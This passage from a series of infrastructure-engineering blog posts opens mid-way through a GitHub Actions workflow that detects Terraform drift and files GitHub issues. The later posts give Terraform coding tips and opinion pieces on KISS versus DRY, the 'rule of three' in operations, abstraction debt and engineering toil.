          if [ $EXIT_CODE -eq 2 ]; then
            echo "drift_detected=true" >> "$GITHUB_OUTPUT"
            echo "Drift detected in ${{ matrix.tf_dir }}"
          elif [ $EXIT_CODE -eq 1 ]; then
            echo "plan_failed=true" >> "$GITHUB_OUTPUT"
            echo "Plan failed in ${{ matrix.tf_dir }}"
          else
            echo "No drift detected in ${{ matrix.tf_dir }}"
          fi

Creating and Updating GitHub Issues

When drift is detected (exit code 2), this step uses the GitHub API via actions/github-script to create trackable issues. It reads the plan output, searches for existing open issues for the specific directory, and either updates the existing issue with a new comment or creates a fresh issue with appropriate labels. This ensures each Terraform directory has a single tracking issue that accumulates drift detections over time, providing an audit trail and preventing issue spam.

Security Note: Terraform plan output may contain sensitive information such as resource IDs, internal IP addresses, or computed values. If your repository is public or your plan output includes sensitive data, consider implementing sanitization logic before creating issues, or restrict this workflow to private repositories with limited access. You may also want to use GitHub Actions secrets masking or filter the plan output to redact sensitive patterns.

      - name: Create or Update Issue on Drift Detection
        if: steps.plan.outputs.drift_detected == 'true'
        uses: actions/github-script@v7.0.1
        with:
          script: |
            const fs = require('fs');
            const path = require('path');
            let planOutput = '';
            try {
              planOutput = fs.readFileSync(path.join('${{ matrix.tf_dir }}', 'plan_output.txt'), 'utf8');
            } catch (error) {
              planOutput = 'Could not read plan output';
            }

            const title = `Terraform Drift Detected: ${{ matrix.tf_dir }}`;
            const driftBody = `## Terraform Drift Detected
            **Directory:** \`${{ matrix.tf_dir }}\`
            **Detection Time:** ${new Date().toISOString()}
            **Workflow:** [${context.runId}](${context.payload.repository.html_url}/actions/runs/${context.runId})
            <details>
            <summary>Plan Output</summary>

            \`\`\`
            ${planOutput}
            \`\`\`

            </details>
            Please review the changes and determine if they should be applied or if the Terraform configuration needs to be updated.`;

            // Search for existing open drift issue for this directory
            const issues = await github.rest.issues.listForRepo({
              owner: context.repo.owner,
              repo: context.repo.repo,
              state: 'open',
              labels: ['drift-detection']
            });

            const existingIssue = issues.data.find(issue =>
              issue.title.includes('Terraform Drift Detected') &&
              issue.title.includes('${{ matrix.tf_dir }}')
            );

            if (existingIssue) {
              // Update existing issue with new drift info
              await github.rest.issues.createComment({
                owner: context.repo.owner,
                repo: context.repo.repo,
                issue_number: existingIssue.number,
                body: `## New Drift Detected\n\n${driftBody}`
              });

              console.log(`Updated existing issue #${existingIssue.number}`);
            } else {
              // Create new issue
              const newIssue = await github.rest.issues.create({
                owner: context.repo.owner,
                repo: context.repo.repo,
                title: title,
                body: driftBody,
                labels: ['terraform', 'drift-detection', 'needs-review']
              });

              console.log(`Created new issue #${newIssue.data.number}`);
            }

Key Benefits

This approach provides several engineering advantages:

Zero External Dependencies: No third-party SaaS tools or agents required
Native Exit Code Logic: Leverages Terraform's detailed-exitcode for precise drift detection
Parallel Execution: Matrix strategy enables concurrent checks across multiple environments
Audit Trail: GitHub issues provide timestamped drift history and workflow run links
Secure Authentication: OIDC eliminates static credential management
Cost Effective: Runs on GitHub Actions free tier for small to medium usage (note that larger deployments with many Terraform directories may exceed free tier limits)

The workflow scales horizontally as you add Terraform directories and provides immediate visibility into infrastructure changes through your existing issue tracking system.

Considerations for Production Use

While this workflow provides solid drift detection, you may want to enhance it for production environments:

Multi-Account Support: This example uses a single AWS role. For multi-account setups, consider using a matrix strategy with account-specific roles or dynamic role selection based on directory structure
Sensitive Data Handling: Implement plan output sanitization if your infrastructure includes secrets or sensitive configuration
Issue Lifecycle Management: Add automation to close issues when drift is resolved or implement a reconciliation step to verify fixes
State Lock Handling: The -lock-timeout=5m provides basic protection, but consider monitoring for persistent lock issues that may indicate state corruption or concurrent modifications
Error Notification: Consider adding Slack/email notifications for plan failures in addition to GitHub issues

If you liked (or hated) this blog, feel free to check out my GitHub!

Terraform Tips from the IaC Trenches

RoseSecurity — Tue, 16 Dec 2025 14:31:00 +0000

After a few years of writing open-source Terraform modules, I've picked up a few syntax tricks that make code safer, cleaner, and easier to maintain. These aren't revolutionary, but they're simple patterns that prevent common mistakes and make the infrastructure more resilient. Based on the configurations I've seen in the wild, these techniques seem to be underutilized.

Use `one()` for Safer Conditional Resource References

When you conditionally create resources with count, don't reach for [0] — use one().

The Problem

It's common to use count with a boolean to conditionally create resources (especially in open-source modules that accommodate a lot of different configuration settings):

data "aws_route53_zone" "this" {
  count = var.create_dns ? 1 : 0
  name  = "rosesecurity.dev"
}

resource "aws_route53_record" "this" {
  zone_id = data.aws_route53_zone.this[0].zone_id  # ❌ Dangerous
  name    = "blog.rosesecurity.dev"
  type    = "A"
  # ...
}

This looks fine and might even work in dev environments where var.create_dns = true. But the moment that variable is false in another environment, you get:

Error: Invalid index

The given key does not identify an element in this collection value:
the collection value is an empty tuple.

The issue? This fails at runtime, not plan time. The code works when the resource exists and breaks when it doesn't.

The Solution

Use one() with the [*] splat operator:

data "aws_route53_zone" "this" {
  count = var.create_dns ? 1 : 0
  name  = "rosesecurity.dev"
}

resource "aws_route53_record" "this" {
  zone_id = one(data.aws_route53_zone.this[*].zone_id)  # ✅ Safe(r)
  name    = "blog.rosesecurity.dev"
  type    = "A"
  # ...
}

The one() function (available in Terraform v0.15+) is designed for this exact pattern:

If count = 0: Returns null gracefully instead of crashing
If count = 1: Returns the element's value
If count ≥ 2: Returns an error (catches your mistake early)

When you use [0], you're assuming the resource exists. When you use one(), you're validating it exists.

Bonus: one() also works with sets, which don't support index notation at all. Using one() makes the code more versatile and future-proof.

Design Better Module Variables with Objects, `optional()`, and `coalesce()`

When building reusable Terraform modules, variable design makes the difference between a module that's fun to use and one that's a configuration nightmare. Here's a pattern that combines several Terraform features to create flexible, well-documented, and maintainable module interfaces.

The Problem: Scattered Variables

Most modules start simple and grow organically, leading to an explosion of individual variables:

# ❌ Scattered variables - hard to manage and document
variable "elasticsearch_subdomain_name" {
  type        = string
  description = "The name of the subdomain for Elasticsearch"
}

variable "elasticsearch_port" {
  type        = number
  description = "Port for Elasticsearch"
  default     = 9200
}

variable "elasticsearch_enable_ssl" {
  type        = bool
  description = "Enable SSL for Elasticsearch"
  default     = true
}

variable "kibana_subdomain_name" {
  type        = string
  description = "The name of the subdomain for Kibana"
  default     = null
}

variable "kibana_port" {
  type        = number
  description = "Port for Kibana"
  default     = 5601
}

variable "kibana_enable_ssl" {
  type        = bool
  description = "Enable SSL for Kibana"
  default     = true
}

# ... and on and on for 12+ more variables

This gets unwieldy fast. Users have to understand which variables are related, documentation becomes repetitive, and adding a new service means adding another set of scattered variables.

The Solution: Group Related Variables into Objects

Use objects with the optional() function to group logically related settings:

# ✅ Grouped by logical component
variable "elasticsearch_settings" {
  type = object({
    subdomain_name = optional(string)
    port           = optional(number, 9200)
    enable_ssl     = optional(bool, true)
  })

  description = <<-DOC
    Configuration settings for Elasticsearch service.

    subdomain_name: The name of the subdomain for Elasticsearch in the DNS zone (e.g., 'elasticsearch', 'search'). Defaults to environment name.
    port: Port number for Elasticsearch. Defaults to 9200.
    enable_ssl: Enable SSL/TLS for Elasticsearch. Defaults to true.
  DOC
  default = {}
}

variable "kibana_settings" {
  type = object({
    subdomain_name = optional(string)
    port           = optional(number, 5601)
    enable_ssl     = optional(bool, true)
  })

  description = <<-DOC
    Configuration settings for Kibana service.

    subdomain_name: The name of the subdomain for Kibana in the DNS zone (e.g., 'kibana', 'ui'). Defaults to environment name.
    port: Port number for Kibana. Defaults to 5601.
    enable_ssl: Enable SSL/TLS for Kibana. Defaults to true.
  DOC
  default = {}
}

The optional() function (Terraform v1.3+) lets you define object attributes that users can omit:

subdomain_name = optional(string)        # Can be omitted, defaults to null
port           = optional(number, 9200)  # Can be omitted, defaults to 9200
enable_ssl     = optional(bool, true)    # Can be omitted, defaults to true

This means users can provide as much or as little configuration as they need:

# Minimal - just override subdomain
elasticsearch = {
  subdomain_name = "search"
  # port and enable_ssl use defaults
}

# Or provide nothing, use all defaults
elasticsearch = {}

# Or customize everything
elasticsearch = {
  subdomain_name = "es-prod"
  port           = 9300
  enable_ssl     = false
}

HEREDOC Syntax for Documentation

Use indented HEREDOC (<<-DOC) to document complex object variables:

description = <<-DOC
  Configuration settings for Elasticsearch service.

  subdomain_name: The name of the subdomain for Elasticsearch in DNS.
  port: Port number for Elasticsearch. Defaults to 9200.
  enable_ssl: Enable SSL/TLS. Defaults to true.
DOC

Why the dash matters:

<<-DOC (with dash): Automatically strips leading whitespace, allowing proper indentation
<<DOC (without dash): Preserves all whitespace, breaking terraform-docs parsing and formatting

The indented version plays nicely with automatic documentation generators like terraform-docs, producing clean, readable output in your README.

Smart Defaults with `coalesce()` and Context

Combine objects with the Terraform null label pattern (context.tf) to provide intelligent defaults:

# Use locals to apply coalesce logic
locals {
  elasticsearch_subdomain = coalesce(var.elasticsearch.subdomain_name, module.this.environment)
  kibana_subdomain        = coalesce(var.kibana.subdomain_name, module.this.environment)
}

# Resources reference the locals
resource "aws_route53_record" "elasticsearch" {
  zone_id = var.zone_id
  name    = "${local.elasticsearch_subdomain}.rosesecurity.dev"
  type    = "CNAME"
  records = [aws_elasticsearch_domain.this.endpoint]
  ttl     = 300
}

resource "aws_route53_record" "kibana" {
  zone_id = var.zone_id
  name    = "${local.kibana_subdomain}.rosesecurity.dev"
  type    = "CNAME"
  records = [aws_elasticsearch_domain.this.kibana_endpoint]
  ttl     = 300
}

The coalesce() function returns the first non-null value, giving you:

Without user input (in "prod" environment):

elasticsearch.prod.rosesecurity.dev
kibana.prod.rosesecurity.dev

With user override:

elasticsearch = {
  subdomain_name = "search"
}

Results in: search.prod.rosesecurity.dev

Let users configure only what matters, default the rest.

Group related variables into objects, use optional() for flexibility, document with indented HEREDOCs, and combine with coalesce() for intelligent defaults. Your module users will thank you.

Avoid Double Negatives in Variable Names

Boolean variables with negative names add unnecessary mental overhead. Positive variable names make conditional logic clearer and reduce the chance of configuration mistakes.

The Problem

# ❌ Negative variable name
variable "disable_encryption" {
  description = "Disable encryption"
  type        = bool
  default     = false
}

resource "aws_s3_bucket_server_side_encryption_configuration" "this" {
  count  = var.disable_encryption ? 0 : 1
  bucket = aws_s3_bucket.this.id
  # ...
}

The count line requires mental translation: "If disable_encryption is false, then count is 1, so encryption is enabled." That's a double negative in what should be straightforward logic.

This pattern creates real problems during code review. A change from default = false to default = true looks like it's "enabling" something when it's actually doing the opposite.

The Solution

# ✅ Positive variable name
variable "encryption_enabled" {
  description = "Enable encryption"
  type        = bool
  default     = true
}

resource "aws_s3_bucket_server_side_encryption_configuration" "this" {
  count  = var.encryption_enabled ? 1 : 0
  bucket = aws_s3_bucket.this.id
  # ...
}

The logic now reads directly: "If encryption_enabled is true, create the encryption config."

Positive naming also makes security choices more explicit. Setting encryption_enabled = false is visually clearer than disable_encryption = true, even though they're functionally equivalent.

Name variables for what they enable, not what they prevent.

If you liked (or hated) this blog, feel free to check out my GitHub!

KISS vs DRY in Infrastructure as Code: Why Simple Often Beats Clever

RoseSecurity — Wed, 19 Nov 2025 15:34:02 +0000

The Scale Gap Problem

Every Infrastructure as Code tutorial starts the same way: provision a single S3 bucket, create one EC2 instance, deploy a basic load balancer. The examples are clean, simple, and elegant. You follow along, everything works, and you feel like you understand Terraform.

Then you get to your actual production environment, and everything changes.

You're not starting from scratch with a blank AWS account. You've got existing resources that were manually created two years ago by someone who left the company. There's brownfield infrastructure everywhere with no clear documentation. You need to import existing state, figure out what's actually running, and somehow wrangle it all into code without breaking production. On top of that, you need to manage 200 instances across dev, staging, and production environments. Multiple AWS accounts with different configurations and permissions. Three regions for disaster recovery. Azure for the legacy workloads that nobody wants to touch. GCP running your GKE clusters for the containerized applications.

Suddenly that elegant tutorial code becomes a nightmare of orchestration, state management, environment-specific configurations, and brownfield complexity. You're not just writing infrastructure code anymore. You're trying to organize, orchestrate, and maintain it at scale while dealing with the reality that infrastructure is messy, evolving, and full of historical baggage.

This is the scale gap, and it's where the KISS vs DRY debate stops being theoretical and starts costing real time, money, and engineering effort.

The DRY Revolution: Solving Yesterday's Problems

When teams hit the scale gap, the instinct is to eliminate repetition. DRY (Don't Repeat Yourself) is gospel in software engineering, so infrastructure engineers did what they do best and built tools to solve the problem.

Terragrunt emerged to manage backend configurations and reduce repetition across environments. Terraspace and other abstraction frameworks followed, promising sophisticated hierarchical inheritance models and dynamic configuration generation. Module libraries grew into complex ecosystems. Teams adopted these patterns because they represented "best practices," not necessarily because they had the specific problems these tools were designed to solve.

The promise was compelling: write your infrastructure once, reuse it everywhere, maintain it in one place, and scale effortlessly.

Terraform itself evolved to address these needs as well, adding workspaces, dynamic blocks, for_each, improved module capabilities, and other features designed to support DRY principles natively.

On paper, it all made perfect sense. In practice, the cost turned out to be higher than anyone expected.

The Hidden Costs of Going DRY

When Abstractions Break, Troubleshooting Becomes Archaeological

It's 3 AM and production is down. You need to understand why Terraform is trying to destroy and recreate your database, and you need to understand it right now.

With a DRY setup using Terragrunt and hierarchical inheritance, you're not just reading Terraform code. You're tracing values through multiple layers: the root terragrunt.hcl with base configurations, environment-specific overrides in nested directories, dynamically generated backend configurations, module abstractions that call other modules, and variables cascading through inheritance chains.

Where did that database configuration value actually come from? The global config? The environment override? A module default? You're playing detective instead of fixing the problem. Each abstraction layer adds cognitive overhead when you can least afford it, which is during high-pressure incidents at 3 AM.

The fundamental issue is that DRY tooling optimizes for writing code, not reading it under pressure.

The Onboarding Cliff

It's a new team member's first day and they need to update a security group rule in the staging environment. Simple enough, right?

With DRY abstraction tooling, they need to learn Terraform itself, your module library's conventions and abstractions, Terragrunt (or Terraspace, or your custom wrapper), your hierarchical configuration structure, how values inherit and override across layers, and where to make changes without breaking other environments.

That's not onboarding, that's an apprenticeship. What should take an hour takes days. What should be a simple change becomes a guided tour through your infrastructure philosophy.

Compare this to opening a directory, seeing exactly what gets deployed to staging, making the change, and submitting a PR. The difference in time-to-productivity is measured in weeks.

Ecosystem Lock-in: The Hidden Technical Debt

Once you've invested in a DRY abstraction framework, you're locked in. Your entire codebase assumes its patterns. Your team has learned its idioms. Your CI/CD pipelines depend on it. Your documentation references it.

Migrating away becomes a massive project that no one wants to fund. Meanwhile, the tool's limitations become your limitations. When Terraform adds new features, you wait for your abstraction layer to support them—if it ever does.

You've traded lines of code for organizational flexibility.

The KISS Alternative: Orchestration in Pipelines, Simplicity in Code

After years of working with various Terraform patterns, from sophisticated DRY frameworks to custom abstraction layers, I found a pattern that just works: pure Terraform with GitHub Actions orchestration.

This isn't about rejecting tools like Terragrunt or Terraspace entirely. They have their place at specific scales and contexts. But for the majority of teams managing infrastructure at moderate scale, there's a simpler path that works better.

The Core Insight: Complexity Can Only Be Relocated

Orchestration complexity across environments cannot be eliminated. You can't wish away the fact that dev, staging, and production need different configurations, or that multi-region deployments require coordination.

The question isn't "how do we eliminate complexity?" It's "where do we put the complexity to minimize time to business value?"

DRY approach: Complexity lives in abstraction tooling and configuration hierarchies
KISS approach: Complexity lives in CI/CD pipelines, where it's observable and debuggable

The Repo Structure: Nested and Navigable

├── aws/
│   ├── us-east-1/
│   │   ├── dev/
│   │   │   ├── vpc/
│   │   │   │   ├── main.tf
│   │   │   │   ├── variables.tf
│   │   │   │   ├── backend.tf
│   │   │   │   └── terraform.tfvars
│   │   │   ├── eks/
│   │   │   │   ├── main.tf
│   │   │   │   ├── variables.tf
│   │   │   │   ├── backend.tf
│   │   │   │   └── terraform.tfvars
│   │   │   ├── mwaa/
│   │   │   │   └── [terraform files]
│   │   │   ├── opensearch/
│   │   │   │   └── [terraform files]
│   │   │   └── rds/
│   │   │       └── [terraform files]
│   │   ├── staging/
│   │   │   ├── vpc/
│   │   │   ├── eks/
│   │   │   ├── mwaa/
│   │   │   └── [other services]
│   │   └── prod/
│   │       ├── vpc/
│   │       ├── eks/
│   │       ├── mwaa/
│   │       └── [other services]
│   └── us-west-2/
│       └── [similar structure]
├── azure/
│   └── [similar structure]
├── gcp/
│   └── [similar structure]
└── modules/
    ├── networking/
    ├── compute/
    ├── kubernetes/
    └── databases/

Key characteristics:

Can break down by service (eks, mwaa, opensearch) or by logical grouping depending on your needs
Each service has its own state file, isolated blast radius
Reusable modules in central directory
No terraliths, no monolithic state files
Completely navigable, you can grep for anything

Each service directory is a complete Terraform root module. Open aws/us-east-1/prod/eks/ and you see exactly what's deployed for your production EKS cluster in us-east-1. No inheritance chains. No dynamic generation. No magic. Just the actual configuration that gets applied.

Yes, Backend Configs Repeat (And That's Actually a Feature)

# aws/core-infrastructure/prod/backend.tf
terraform {
  backend "s3" {
    bucket         = "myorg-terraform-state-prod"
    key            = "core-infrastructure/terraform.tfstate"
    region         = "us-east-1"
    encrypt        = true
    dynamodb_table = "terraform-state-lock-prod"
  }
}

This config appears in every environment directory with slight variations. DRY purists hate this, but I love it.

When something goes wrong with state, I can immediately see which bucket holds this state, which DynamoDB table provides locking, and I don't need to trace through dynamic generation logic. Running grep "myorg-terraform-state-prod" shows me every environment using that bucket instantly.

The cost of repetition is about 100 lines of simple YAML across 20 environments. The benefit is instant troubleshooting, zero cognitive overhead, and perfect clarity about where everything lives.

Orchestration Lives in Pipelines

This is where the magic happens, and where the orchestration complexity actually belongs.

Home-grown GitHub Actions provide:

For Pull Requests:

Auto-detect which environments changed based on file paths
Run terraform plan for affected environments
Post plan output as PR comment
Run security/compliance checks
Block merge on plan failures

For Main Branch:

Auto-detect environments to apply
Run terraform apply with approval gates
Alert on failed applies
Remediate orphaned resources
Track drift and create tickets

Scheduled:

Nightly drift detection across all environments
Compare live state to code
Alert on unexpected changes

The result is minimal troubleshooting, teams freed to focus on business value, and infrastructure that's invisible (which is exactly as it should be).

Addressing the Objections

"But You're Repeating Backend Configurations!"

Yes. Intentionally.

100 lines of repeated backend config across environments vs. 40 hours learning Terragrunt's nuances. Which has a better ROI?

Repetition creates greppability. When investigating state issues, grep "bucket-name" immediately shows every environment. No tracing through dynamic generation. No "where did this value come from?"

In infrastructure code, transparency trumps terseness every time.

"You Don't Have Hierarchical Inheritance!"

Correct, and that's also intentional.

Hierarchical inheritance creates implicit dependencies. Values cascade from global to regional to environment-specific configs. When something breaks, you're debugging the inheritance chain instead of the infrastructure.

Without inheritance, every value is explicit in the environment directory. New team members don't need to learn your inheritance model, they just read the config.

The onboarding time saved pays for repeated config 100 times over.

"This Won't Scale!"

It depends on what you mean by "scale."

200 environments across multiple accounts and regions? This pattern handles it cleanly. Each environment is independent, changes are isolated, and blast radius is contained.

The pattern breaks down at truly massive scale, like 1000+ environments with complex interdependencies. At that point, you need more sophisticated tooling. But be honest: do you actually have that problem, or are you solving for imagined future scale?

Most teams adopt DRY tooling as "best practice" before hitting the scale where it provides value. They pay the complexity cost without reaping the benefits.

When to Use What: The Nuanced Reality

KISS Makes Sense When:

You have fewer than 500 environments
Team size is small to medium (< 50 engineers)
Change frequency is low (infrastructure mostly stable after initial deployment)
Operational clarity is critical (regulated industries, high-stakes infrastructure)
Team has varied experience levels (sysadmins, not primarily developers)
Troubleshooting speed matters more than code elegance

DRY Tooling Makes Sense When:

You genuinely have massive scale (1000+ environments with interdependencies)
Your team is primarily platform engineers comfortable with abstraction
You have dedicated platform team maintaining the tooling
Environment configurations have complex shared logic that changes frequently
You're building infrastructure-as-a-product with many consumers
Compliance requires enforced patterns across all deployments

The Real Question: What's Your Actual Cost Metric?

If your cost metric is lines of code written, choose DRY.
If your cost metric is time to accomplish business goals, choose KISS.

Everything that increases time to business value (technical debt from abstraction, lengthy onboarding, opaque troubleshooting) is expensive regardless of how "clean" the code looks.

The Anti-Pattern: Engineering for Engineering's Sake

The most dangerous trap in infrastructure work is falling in love with the tool or solution rather than the problem.

When teams spend months building sophisticated hierarchies with dynamic generation and complex inheritance models, they're often solving for code aesthetics, not business needs. The infrastructure becomes the focus instead of what it enables.

Good infrastructure engineering is invisible. It lets other teams ship quickly without thinking about the underlying platforms. It doesn't require specialized knowledge to make basic changes. It doesn't become a bottleneck or a point of pride, it's just there, working, quietly enabling the business.

This requires humility. The "clever" solution that demonstrates engineering prowess is often the wrong solution for the business. The "boring" solution that anyone can understand and modify is often right.

The Minimum Viable Architecture Principle

Start with what you need now. Build it simply. Make it modular so pieces can be replaced. Iterate and improve over time as actual needs emerge.

Don't build for imagined future scale that may never materialize. Don't adopt sophisticated tooling because it's "best practice" if you don't have the problems it solves. Don't engineer abstractions that save lines of code but cost weeks of onboarding time.

Infrastructure is an auxiliary operation. Its job is to get out of the way and let the business move fast. Every layer of abstraction, every sophisticated pattern, every clever optimization should be justified by actual business impact—not engineering aesthetics.

Conclusion: Choose Boring Technology

After years of working with Infrastructure as Code at various scales, here's what I've learned:

Orchestration complexity can't be eliminated, it can only be relocated. The question is where to put it. For most teams, putting that complexity in observable, debuggable CI/CD pipelines beats putting it in abstraction frameworks and configuration hierarchies.

Terraform itself is powerful enough for most use cases. Most teams don't need additional abstraction layers. Pure Terraform with thoughtful repo structure and pipeline orchestration handles moderate scale beautifully while keeping troubleshooting straightforward and onboarding fast.

There's a place for sophisticated DRY tooling at massive scale with dedicated platform teams. But most teams aren't there yet. They're paying complexity costs for benefits they haven't yet earned.

Choose boring technology. Keep it simple. Focus on business velocity over code elegance. Your 3 AM self will thank you.

If you liked (or hated) this blog, feel free to check out my GitHub!

Gang of Three: Pragmatic Operations Design Patterns

RoseSecurity — Fri, 24 Oct 2025 16:54:20 +0000

This blog is dedicated to arcaven, who initially made me aware of this observation and opened my eyes to the wild world of infrastructure and system operations patterns at scale.

I Can't Unsee It

A few weeks ago, something clicked. Maybe the shorter, winter-approaching days slowed me down enough to notice, but suddenly threes were everywhere. Why do we split environments into development, staging, and production? Why do we stage upgrades across three clusters? Why do we run hot, warm, and cold storage tiers? Why does our CI/CD pipeline have build and test, staging deployment, and production deployment gates?

The number three keeps showing up in systems work, and surprisingly few people talk about it explicitly. As it turns out, this pattern is not coincidence. It represents the intersection of distributed systems theory and practical operations experience. Once you start looking for it, you'll find the rule of three embedded in nearly every mature infrastructure decision.

Where Consensus Algorithms Meet Change Management

Distributed systems run on quorum-based decision making. What that means is that a majority of nodes have to agree before committing state changes (see Paxos and Raft). These consensus algorithms are designed to handle node failures, communication delays, and network partitions while ensuring the system can continue making progress even when failures occur. With three nodes, you can lose one and still have two nodes available to form a majority. This gives you fault tolerance and forward progress in the same architectural package.

Two nodes cannot lose anything without risking deadlock or split-brain scenarios. Four or five nodes provide more headroom for failures, but three is the minimum viable number that actually delivers reliable consensus. It is also practical from a cost and complexity perspective. This is why you see three-node clusters everywhere across the industry. This is not cargo culting or blind imitation, this is mathematics driving architecture.

The same logic drives traditional thinking around redundancy planning. Three instances means one for baseline capacity, one available during maintenance windows, and one ready for the surprise failure at 3am. Load balancers, database replicas, and availability zones all follow this pattern because it maps cleanly to how systems actually fail in production environments.

This pattern also extends to monitoring and alerting systems. Three data points allow you to establish a trend and distinguish between noise and signal. A single metric spike might be nothing, two consecutive spikes suggest investigation, but three consecutive anomalies typically trigger automated responses or pages. The threshold of three provides enough confidence to act without creating alert fatigue from false positives.

AWS Best Practices and Chaos Engineering

AWS regions typically ship with three or more availability zones, and the Well-Architected Framework encourages spreading workloads across them. This is not just resilience theater or checkbox compliance. It embodies that same quorum mathematics we discussed earlier. Lose one availability zone and your system continues running with consensus intact. Your application remains available, your data stays consistent, and your customers notice nothing.

Chaos engineering practices naturally gravitate toward threes as well. Kill one instance and observe what happens. You are testing real failure modes while keeping two healthy nodes as a safety net. This allows destructive testing that does not actually destroy your service. You gain confidence in your resilience mechanisms without risking a full outage. Tools like Chaos Monkey and Gremlin are built around this philosophy of controlled, incremental failure injection.

Rolling deployments across three clusters provide a built-in verification pattern that works remarkably well in practice. Deploy to the first cluster, verify correct behavior, then proceed to the second. Verify again, then move to the third. These two checkpoints before full rollout give you opportunities to catch unusual issues before they propagate everywhere. Your first cluster serves as your canary, detecting problems early. Your second cluster provides a confidence check that the issue was not environment-specific. Your third cluster represents your validated rollout to the remainder of your infrastructure.

Storage Hierarchies and Performance Tiers

Storage systems provide another compelling example of the rule of three in action. Hot storage serves frequently accessed data with low latency. Warm storage holds less frequently accessed data at moderate cost and performance. Cold storage archives rarely accessed data at minimal cost. This three-tier architecture balances performance requirements against budget constraints while providing clear migration paths as data ages.

Cloud providers have built entire product lines around this model. Amazon S3 offers Standard, Infrequent Access, and Glacier tiers. Azure provides Hot, Cool, and Archive tiers. Google Cloud offers Standard, Nearline, and Coldline storage classes. The consistency across providers suggests this is not arbitrary product segmentation but rather a natural reflection of how organizations actually use data over time.

Database systems follow similar patterns. Many databases implement a three-level caching strategy with L1 cache in memory, L2 cache on fast local storage, and L3 representing the authoritative data on persistent storage. Each level trades off speed for capacity and durability. This hierarchy allows databases to serve most queries from fast cache while maintaining data integrity through persistent storage.

The Practical Value of Three

Understanding why three works so well helps us make better infrastructure decisions. When designing a new system, starting with three of anything gives you a resilient foundation without over-engineering. Three availability zones, three environment tiers, three deployment stages, three monitoring thresholds. Each application of the pattern provides fault tolerance, verification opportunities, and practical operability.

This does not mean three is always the right answer. Some systems genuinely need more redundancy or more granular staging. However, three serves as an excellent default that you should consciously decide to deviate from rather than accidentally under-provision. If you find yourself choosing two of something, ask whether you are accepting unnecessary fragility. If you are choosing five, ask whether the additional complexity provides proportional value. Thanks for reading, and if you like this blog, you might like the code and tools in my Github.

I love writing useless tools... but I also believe that infrastructure-as-code deserves some more spice and flair, so I created Neofetch for Terraform! https://github.com/RoseSecurity/terrafetch

RoseSecurity — Wed, 28 May 2025 12:30:10 +0000

The Abstraction Debt in Infrastructure as Code

RoseSecurity — Fri, 11 Apr 2025 12:10:12 +0000

This article serves as the starting point for a microblog series exploring the challenges of managing Infrastructure-as-Code (IaC) at scale. The reflections here are solely my own views, based on my experiences and the lessons learned (sometimes the hard way) when building and maintaining large-scale infrastructure. This first entry lays the groundwork for the complexities, trade-offs, and regrets that come with designing IaC solutions.

In the Early Days

When we initially adopted IaC, the goal was clear: manage multiple environments efficiently, at scale, with precision and consistency. This is a vision many teams share, but as scale grows, the constraints of existing tools become apparent. Terraform’s native capabilities, while powerful (and since expanded with workspaces and other extensible features), were limiting when trying to orchestrate infrastructure across multiple AWS organizations and dozens of accounts in a DRY and reusable way.

I came across numerous tutorials demonstrating the simplicity of spinning up an EC2 instance in us-east-1, but when that scales to provisioning 500 servers across multiple AWS organizations, those examples fall apart. At this point, the choices become either extending Terraform’s capabilities with additional tooling or abandoning DRY principles and managing complexity through repetition.

Initially, abstraction seemed like the best answer. However, a problem emerged that I hadn’t anticipated: over-abstraction became a form of technical debt. Abstraction is meant to encapsulate complexity, but when done poorly, it creates opacity—a lack of visibility into what’s actually happening under the hood. When a system inevitably breaks, new team members must wade through multiple layers of abstraction just to diagnose a simple issue. What started as an attempt to simplify infrastructure management ended up creating barriers to understanding and troubleshooting. The real challenge becomes: How do we balance complexity with simplifying processes without over-abstracting everything?

Where Abstraction Becomes a Liability

While abstraction is often framed as a best practice, it can quickly become a liability. Deeply nested modules make understanding resource interactions difficult. Custom wrappers and internal CLIs built on top of Terraform introduce learning curves and debugging complexity. Hidden dependencies, such as implicit tagging schemes or assumptions baked into modules, make troubleshooting non-obvious issues much harder. At some point, abstraction reaches a point of diminishing returns, where the overhead required to maintain and debug it outweighs the benefits of reuse.

How to Balance Simplicity with Over-Abstraction

To prevent abstraction from becoming a burden, it’s critical to strike the right balance. Escape hatches must exist so engineers can bypass abstractions when needed. A Terraform module should allow direct modification of key parameters rather than enforcing rigid defaults. Observability must be a first-class concern; abstractions should provide clear logs, structured outputs, and access to underlying configurations. Versioning and documentation should be explicit and ensure that abstractions are transparent in their purpose. Finally, abstractions should only be introduced once a pattern has been implemented natively at least once. Premature abstraction often leads to overengineering rather than efficiency.

Conclusion

The key takeaway is that abstraction in IaC should be a tool for scalability, not avoidance of complexity. If the complexity of an abstraction exceeds the complexity of the problem it was meant to solve, it’s doing more harm than good. This is just the beginning of the discussion. In future posts, I’ll explore random challenges and thoughts that pop up as we navigate the wild world of infrastructure together.

If you're interested in more of my work, feel free to check out my GitHub. It's where I keep all of the good stuff.

Engineering in Quicksand

RoseSecurity — Tue, 08 Apr 2025 02:10:37 +0000

Welcome to part two of my microblog series on the overlooked killers of engineering teams—the problems that quietly erode productivity in the DevOps community without getting much attention. I previously covered over-abstraction as a liability, showing how excessive layers of abstraction introduce technical debt.

Today, I’m tackling another silent killer: toil. It’s the invisible weight dragging teams down, forcing engineers to maintain instead of build. While some toil is inevitable, too much of it suffocates innovation and drives attrition. Let’s talk about how it happens—and how to stop it.

The Birth of Toil

"Needing a human in the loop isn’t a feature... it’s a failure. And as your system grows, so does the cost of that failure. What’s ‘normal’ today won’t be tomorrow."

When I first stepped into the world of Site Reliability Engineering, I was introduced to the concept of toil. Google’s SRE handbook defines toil as anything repetitive, manual, automatable, reactive, and scaling with service growth—but in reality, it’s much worse than that. Toil isn’t just a few annoying maintenance tickets in Jira; it’s a tax on innovation. It’s the silent killer that keeps engineers stuck in maintenance mode instead of building meaningful solutions.

I saw this firsthand when I joined a new team plagued by recurring Jira tickets from a failing dnsmasq service on their autoscaling GitLab runner VMs. The alarms never stopped. At first, I was horrified when the proposed fix was simply restarting the daemon and marking the ticket as resolved. The team had been so worn down by years of toil and firefighting that they’d rather SSH into a VM and run a command than investigate the root cause. They weren’t lazy—they were fatigued.

This kind of toil doesn’t happen overnight. It’s the result of years of short-term fixes that snowball into long-term operational debt. When firefighting becomes the norm, attrition spikes, and innovation dies. The team stops improving things because they’re too busy keeping the lights on. Toil is self-inflicted, but the first step to recovery is recognizing it exists and having the will to automate your way out of it.

Addressing Toil and Moving Forward

By now, I’ve spent plenty of time hammering home how toil is silently killing your engineering team, but let’s be real—not all toil is bad. Some engineers actually enjoy the predictability of a well-understood, repeatable task. The problem isn’t toil itself; it’s when it overwhelms a team and leaves no room for innovation.

